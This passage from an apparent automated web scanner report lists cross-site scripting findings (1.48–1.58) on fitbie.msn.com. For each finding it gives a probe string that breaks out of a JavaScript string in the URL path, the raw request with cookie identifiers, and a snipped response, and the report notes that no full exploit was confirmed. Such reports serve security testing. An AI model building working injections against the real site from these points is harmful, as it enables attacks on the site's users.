<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all8b351';5ead8e0ecba?destination=node%2Fall8b351';5ead8e0ecba&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.48. http://fitbie.msn.com/sites/all/modules/rodale/smartbar/scripts/smartbar.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/rodale/smartbar/scripts/smartbar.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6ea25'%3b652feccf332 was submitted in the REST URL parameter 2. This input was echoed as 6ea25';652feccf332 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all6ea25'%3b652feccf332/modules/rodale/smartbar/scripts/smartbar.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:34 +0000
ETag: "1297606714-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:35 GMT
Date: Sun, 13 Feb 2011 14:18:35 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50605

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all6ea25';652feccf332?destination=node%2Fall6ea25';652feccf332&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.49. http://fitbie.msn.com/sites/all/modules/rodale/smartbar/stylesheets/smartbar.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/rodale/smartbar/stylesheets/smartbar.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e68f'%3b3b6a94091d1 was submitted in the REST URL parameter 2. This input was echoed as 8e68f';3b6a94091d1 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all8e68f'%3b3b6a94091d1/modules/rodale/smartbar/stylesheets/smartbar.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:10 +0000
ETag: "1297606690-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:11 GMT
Date: Sun, 13 Feb 2011 14:18:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all8e68f';3b6a94091d1?destination=node%2Fall8e68f';3b6a94091d1&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.50. http://fitbie.msn.com/sites/all/modules/views/css/views.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/modules/views/css/views.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cdb9f'%3ba3e3a5182e2 was submitted in the REST URL parameter 2. This input was echoed as cdb9f';a3e3a5182e2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/allcdb9f'%3ba3e3a5182e2/modules/views/css/views.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:13 +0000
ETag: "1297606693-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:14 GMT
Date: Sun, 13 Feb 2011 14:18:14 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50541

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allcdb9f';a3e3a5182e2?destination=node%2Fallcdb9f';a3e3a5182e2&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.51. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/cssloader.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/themes/fitlife/javascripts/cssloader.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d4cf1'%3b971aeaa85e6 was submitted in the REST URL parameter 2. This input was echoed as d4cf1';971aeaa85e6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/alld4cf1'%3b971aeaa85e6/themes/fitlife/javascripts/cssloader.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:09 +0000
ETag: "1297606689-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50589

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/alld4cf1';971aeaa85e6?destination=node%2Falld4cf1';971aeaa85e6&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.52. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/fitlife.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/themes/fitlife/javascripts/fitlife.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5195'%3b95e08c3e7d6 was submitted in the REST URL parameter 2. This input was echoed as c5195';95e08c3e7d6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/allc5195'%3b95e08c3e7d6/themes/fitlife/javascripts/fitlife.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:11 +0000
ETag: "1297606691-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/allc5195';95e08c3e7d6?destination=node%2Fallc5195';95e08c3e7d6&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.53. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.browser.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/themes/fitlife/javascripts/jquery.browser.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9b741'%3b1c410d1c975 was submitted in the REST URL parameter 2. This input was echoed as 9b741';1c410d1c975 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all9b741'%3b1c410d1c975/themes/fitlife/javascripts/jquery.browser.min.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:10 +0000
ETag: "1297606690-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:11 GMT
Date: Sun, 13 Feb 2011 14:18:11 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50625

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all9b741';1c410d1c975?destination=node%2Fall9b741';1c410d1c975&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.54. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/themes/fitlife/javascripts/jquery.hoverIntent.minified.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7081d'%3bb1fcee59260 was submitted in the REST URL parameter 2. This input was echoed as 7081d';b1fcee59260 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all7081d'%3bb1fcee59260/themes/fitlife/javascripts/jquery.hoverIntent.minified.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:10 +0000
ETag: "1297606690-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:10 GMT
Date: Sun, 13 Feb 2011 14:18:10 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50661

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all7081d';b1fcee59260?destination=node%2Fall7081d';b1fcee59260&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.55. http://fitbie.msn.com/sites/all/themes/fitlife/javascripts/jquery.jcarousel.min.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/themes/fitlife/javascripts/jquery.jcarousel.min.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 883e8'%3bdd6432054c2 was submitted in the REST URL parameter 2. This input was echoed as 883e8';dd6432054c2 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all883e8'%3bdd6432054c2/themes/fitlife/javascripts/jquery.jcarousel.min.js?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:18 +0000
ETag: "1297606698-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:19 GMT
Date: Sun, 13 Feb 2011 14:18:19 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all883e8';dd6432054c2?destination=node%2Fall883e8';dd6432054c2&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.56. http://fitbie.msn.com/sites/all/themes/fitlife/stylesheets/fitlife.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/themes/fitlife/stylesheets/fitlife.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 947c9'%3bc8f8c6e6f7a was submitted in the REST URL parameter 2. This input was echoed as 947c9';c8f8c6e6f7a in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/all947c9'%3bc8f8c6e6f7a/themes/fitlife/stylesheets/fitlife.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:12 +0000
ETag: "1297606692-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:12 GMT
Date: Sun, 13 Feb 2011 14:18:12 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/all947c9';c8f8c6e6f7a?destination=node%2Fall947c9';c8f8c6e6f7a&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.57. http://fitbie.msn.com/sites/all/themes/fitlife/stylesheets/print.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/all/themes/fitlife/stylesheets/print.css

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d68dd'%3b1fcb816ab0e was submitted in the REST URL parameter 2. This input was echoed as d68dd';1fcb816ab0e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sites/alld68dd'%3b1fcb816ab0e/themes/fitlife/stylesheets/print.css?0 HTTP/1.1
Host: fitbie.msn.com
Proxy-Connection: keep-alive
Referer: http://fitbie.msn.com/fit_tools/daily_caloriesa2bfc'%3b4eaeaddbc3
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mh=MSFT; CC=US; CULTURE=EN-US; __qca=P0-161320755-1294800573610; v1st=F66AF379BC0B14B4; ATC_ID=173.193.214.243.1295383441535041; MC1=V=3&GUID=2c575060fb3a4380836e46d3373d455e; expid=id=5ca78fdb393b42bca682ecc2f59244cc&bd=2011-02-11T18:30:04.762&v=2; MUID=DC63BAA44C3843F38378B4BB213E0A6F; SRCHHPGUSR=AS=1; Sample=69

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a PHP/5.3.3
X-Powered-By: PHP/5.3.3
X-Drupal-Cache: MISS
Last-Modified: Sun, 13 Feb 2011 14:18:14 +0000
ETag: "1297606694-1"
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=3600
Expires: Sun, 13 Feb 2011 15:18:15 GMT
Date: Sun, 13 Feb 2011 14:18:15 GMT
Connection: close
Vary: Accept-Encoding
Content-Length: 50577

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" dir="ltr" xmlns:fb="htt
...[SNIP]...
<a href="/flag/flag/favorites/alld68dd';1fcb816ab0e?destination=node%2Falld68dd';1fcb816ab0e&amp;" title="Add this post to your favorites" class="flag flag-action flag-link-toggle" rel="nofollow">
...[SNIP]...

1.58. http://fitbie.msn.com/sites/default/files/200276112-001-TH_0.jpg [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://fitbie.msn.com
Path:   /sites/default/files/200276112-001-TH_0.jpg

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5f8bd'%3b7858d5db37 was submitted in the REST URL parameter 2. This input was echoed as 5f8bd';7858d5db37 in the application's response.

